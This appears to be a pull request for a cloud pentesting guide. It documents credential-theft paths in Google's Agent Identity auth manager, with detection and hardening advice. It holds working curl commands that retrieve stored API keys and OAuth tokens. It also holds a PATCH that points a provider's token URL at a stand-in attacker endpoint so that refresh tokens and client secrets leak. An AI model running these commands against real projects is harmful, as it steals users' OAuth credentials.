### PR TITLE
Document Agent Identity credential vault attack paths

### DIFF
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -177,6 +177,7 @@
     * [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
     * [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
   * [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
+    * [GCP - Agent Identity Auth Manager Credential Access](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-agent-identity-auth-manager-privesc.md)
     * [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)
   * [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md)
     * [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md)

--- a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
+++ b/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
@@ -17,6 +17,14 @@ Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).p
 
 ## **From GCP to GWS**
 
+### Agent Identity auth-manager credentials
+
+Agent Identity auth providers can hold API keys, OAuth client credentials, and per-user OAuth tokens. A compromised principal with provider credential-retrieval or update access may recover existing tokens or intercept them during a later refresh. Workspace impact is conditional on a Google OAuth provider and previously consented Workspace scopes.
+
+{% content-ref url="gcp-agent-identity-auth-manager-privesc.md" %}
+[gcp-agent-identity-auth-manager-privesc.md](gcp-agent-identity-auth-manager-privesc.md)
+{% endcontent-ref %}
+
 ### **Domain Wide Delegation basics**
 
 Google Workspace's Domain-Wide delegation allows an identity object, either an **external app** from Google Workspace Marketplace or an internal **GCP Service Account**, to **access data across the Workspace on behalf of users**.

--- a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-agent-identity-auth-manager-privesc.md
+++ b/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-agent-identity-auth-manager-privesc.md
@@ -1,0 +1,135 @@
+# GCP - Agent Identity Auth Manager Credential Access
+
+Google's **Agent Identity auth manager** is a centralized vault for API keys, OAuth client credentials, and per-user OAuth tokens used by AI agents and MCP tools.<sup>[[1]](#references)</sup> This creates two important post-exploitation paths:
+
+* **`agentidentity.authProviders.retrieveCredentials`** can return a stored API key or a previously authorized user's OAuth access token.
+* **`agentidentity.authProviders.update`** can redirect a 3-legged OAuth provider's token endpoint. During a later refresh, the vault sends the stored refresh token and OAuth client credentials to the new endpoint.
+
+Both are **High**, conditional findings rather than automatic Workspace compromise. Their impact depends on the provider, existing credentials or user authorizations, OAuth scopes, and knowing the provider resource name.
+
+{% hint style="danger" %}
+These techniques do **not** mean that a principal with `iam.serviceAccounts.getAccessToken`, or even with an Agent Identity permission, can read every user's Drive. A Workspace pivot exists only when the affected auth provider uses Google OAuth and the specific user previously consented to Workspace-capable scopes such as Drive, Gmail, Calendar, or Admin SDK scopes.<sup>[[2]](#references)[[3]](#references)</sup>
+{% endhint %}
+
+## Read-only enumeration and no-list fallback
+
+Auth providers are regional. Listing locations requires `agentidentity.locations.list`, and listing providers requires `agentidentity.authProviders.list` on the location parent.<sup>[[4]](#references)[[5]](#references)</sup>
+
+```bash
+PROJECT_ID="project-id"
+ACCESS_TOKEN="$(gcloud auth print-access-token)"
+
+# List locations visible in the project.
+curl -sS \
+  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "x-goog-user-project: ${PROJECT_ID}" \
+  "https://agentidentity.googleapis.com/v1/projects/${PROJECT_ID}/locations"
+
+# List active providers in one known location. Do not request showDeleted=true.
+LOCATION="us-central1"
+curl -sS \
+  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "x-goog-user-project: ${PROJECT_ID}" \
+  "https://agentidentity.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION}/authProviders?pageSize=1000&showDeleted=false"
+```
+
+The dangerous permissions do not imply `get` or `list`. If listing is denied, recover provider names from agent source/configuration, deployment manifests, logs, previous error messages, or other locally available artifacts. With a known full name, use the provider's read-only `testIamPermissions` method directly:
+
+```bash
+PROVIDER="projects/${PROJECT_ID}/locations/${LOCATION}/authProviders/provider-name"
+
+curl -sS -X POST \
+  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "x-goog-user-project: ${PROJECT_ID}" \
+  -H 'Content-Type: application/json' \
+  --data '{"permissions":["agentidentity.authProviders.retrieveCredentials","agentidentity.authProviders.update"]}' \
+  "https://agentidentity.googleapis.com/v1/${PROVIDER}:testIamPermissions"
+```
+
+Do not mix `agentidentity.authProviders.list` or `create` into this provider-level request: those permissions apply to the location parent and can make the whole batch fail with HTTP 400. Also remember that Google documents `testIamPermissions` as potentially failing open; use it as enumeration evidence, not as an authorization control.<sup>[[6]](#references)</sup>
+
+GCPPEASS performs this safe flow automatically and accepts a known-name fallback:
+
+```bash
+python3 GCPPEAS.py \
+  --resource "agent-auth-provider:${PROVIDER}" \
+  --only-specified \
+  --billing-project "${PROJECT_ID}"
+```
+
+## `agentidentity.authProviders.retrieveCredentials`
+
+The credentials API requires the exact `agentidentity.authProviders.retrieveCredentials` permission. A successful response contains a `success.token` and the header in which the caller should inject it.<sup>[[2]](#references)</sup>
+
+```bash
+USER_ID="known-user@example.com"
+
+curl -sS -X POST \
+  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "x-goog-user-project: ${PROJECT_ID}" \
+  -H 'Content-Type: application/json' \
+  --data "{\"userId\":\"${USER_ID}\",\"continueUri\":\"https://authorized-client.example/validateUserId\"}" \
+  "https://agentidentitycredentials.googleapis.com/v1/${PROVIDER}/credentials:retrieve"
+```
+
+Observed behavior:
+
+* For an **API-key provider**, any non-empty `userId` returned the same provider-wide key. An empty value was rejected.
+* For **3-legged OAuth**, the `userId` was an exact, case-sensitive vault lookup key. The correct value returned the stored access token; a different or differently cased value started a new consent flow.
+* A 3LO request requires `continueUri` even when an authorization already exists.
+* `forceRefreshToken` is not a Boolean. It must contain the full previously returned access-token string and asks the vault to refresh it by using the stored refresh token.<sup>[[2]](#references)</sup>
+
+### Conditional GCP to Workspace pivot
+
+Google explicitly supports configuring the provider with Google's authorization and token endpoints.<sup>[[3]](#references)</sup> If the authorized user's scopes include Workspace APIs, the recovered token can access only the resources permitted by those scopes and by that user. It does not bypass OAuth consent, expand scopes, impersonate another user, or provide domain-wide delegation.
+
+{% hint style="info" %}
+**Live validation (2026-09-08):** In `gcp-labs-ly3gvnn7`, a service account with a custom role containing only `agentidentity.authProviders.retrieveCredentials` received HTTP 403 for provider GET and LIST but HTTP 200 from `credentials:retrieve`. It recovered a synthetic API key for arbitrary non-empty IDs. Separately, an OAuth authorization finalized by one principal under `workspace-victim@example.invalid` was retrieved intact by the exact-permission service account using that same ID; wrong and differently cased IDs required consent. No real Workspace token or data was used.
+{% endhint %}
+
+## `agentidentity.authProviders.update` token-endpoint interception
+
+An update-only principal can patch nested 3LO fields without reading the provider or its secrets.<sup>[[7]](#references)</sup> Replacing only `tokenUrl` creates a delayed credential-interception path:
+
+```bash
+ATTACKER_TOKEN_URL="https://authorized-test-endpoint.example/oauth/token"
+
+curl -sS -X PATCH \
+  -H "Authorization: Bearer ${ACCESS_TOKEN}" \
+  -H "x-goog-user-project: ${PROJECT_ID}" \
+  -H 'Content-Type: application/json' \
+  --data "{\"name\":\"${PROVIDER}\",\"authProviderTypeParams\":{\"threeLeggedOauth\":{\"tokenUrl\":\"${ATTACKER_TOKEN_URL}\"}}}" \
+  "https://agentidentity.googleapis.com/v1/${PROVIDER}?updateMask=authProviderTypeParams.threeLeggedOauth.tokenUrl"
+```
+
+When a legitimate caller later refreshes a stored user token, the auth manager sends an OAuth refresh request to the modified URL. The receiving endpoint can obtain the stored **refresh token**, **client ID**, and **client secret**. Those values can allow direct token refreshes against the original OAuth provider and access within the user's previously consented scopes.
+
+This path requires all of the following:
+
+1. A known, existing 3LO auth provider.
+2. At least one stored user authorization.
+3. `agentidentity.authProviders.update` on that provider.
+4. A later legitimate token refresh. The update permission alone does not immediately return any credential.
+
+{% hint style="info" %}
+**Live validation (2026-09-08):** A service account with only `agentidentity.authProviders.update` received HTTP 403 for provider GET, LIST, and `credentials:retrieve`, but successfully patched only the token URL. After a legitimate principal forced refresh of a pre-existing synthetic authorization, the replacement endpoint confirmed receipt of the exact synthetic refresh token, client ID, and client secret. The test endpoint recorded only Boolean matches; all authorizations, providers, IAM bindings, custom roles, service accounts, images, services, and source artifacts were removed afterward.
+{% endhint %}
+
+## Detection and hardening
+
+* Treat `roles/agentidentity.user` and any custom role containing `retrieveCredentials` as direct credential-vault access, not ordinary agent execution.
+* Restrict `roles/agentidentity.editor` and custom roles containing `authProviders.update`. Review changes to authorization and token URLs immediately.
+* Bind users/agents to individual auth providers rather than granting project-wide access where possible.
+* Keep `allowedScopes` narrow. An empty allow-list permits all scopes not explicitly blocked.
+* Inventory provider URLs and compare them with approved OAuth domains. Revoke affected user authorizations and rotate the OAuth client secret if a token endpoint was modified.
+* Review Admin Activity and Data Access logs for provider updates and credential retrieval, accounting for the fact that Data Access logging may need explicit enablement.
+
+## References
+
+* [1] [Agent Identity auth manager overview](https://docs.cloud.google.com/iam/docs/auth-manager-overview)
+* [2] [`credentials.retrieve` REST method](https://docs.cloud.google.com/iam/docs/reference/agentidentitycredentials/rest/v1/projects.locations.authProviders.credentials/retrieve)
+* [3] [Authenticate using 3-legged OAuth with auth manager](https://docs.cloud.google.com/iam/docs/auth-with-3lo-v2)
+* [4] [Agent Identity supported locations](https://docs.cloud.google.com/iam/docs/agent-identity-locations)
+* [5] [`authProviders.list` REST method](https://docs.cloud.google.com/iam/docs/reference/agentidentity/rest/v1/projects.locations.authProviders/list)
+* [6] [`authProviders.testIamPermissions` REST method](https://docs.cloud.google.com/iam/docs/reference/agentidentity/rest/v1/projects.locations.authProviders/testIamPermissions)
+* [7] [`authProviders.patch` REST method](https://docs.cloud.google.com/iam/docs/reference/agentidentity/rest/v1/projects.locations.authProviders/patch)


### PR DESCRIPTION
## Summary

- document direct API-key/OAuth-token retrieval through `agentidentity.authProviders.retrieveCredentials`
- document 3LO token-endpoint replacement through `agentidentity.authProviders.update`
- add no-list known-name enumeration and strict Workspace scope/consent caveats

## Live validation

Tested in authorized project `gcp-labs-ly3gvnn7` on 2026-09-08 with synthetic secrets only.

- retrieve-only service account: provider GET/LIST returned 403; credential retrieval returned the exact synthetic API key and, for the exact case-sensitive user ID, the OAuth access token finalized by a different principal
- update-only service account: provider GET/LIST/retrieve returned 403; a token-URL-only patch succeeded; the next legitimate refresh delivered the exact synthetic refresh token, client ID, and client secret to the replacement endpoint
- wrong/differently-cased 3LO user IDs required a new consent flow
- no real Workspace OAuth token or Workspace data was used

All test authorizations were revoked. Providers were soft-deleted, and all service accounts, custom roles, IAM bindings, Cloud Run services, container images, build-source objects, and temporary API enablements were removed.

## Validation

- all seven official Google documentation links return HTTP 200
- `git diff --check` passes
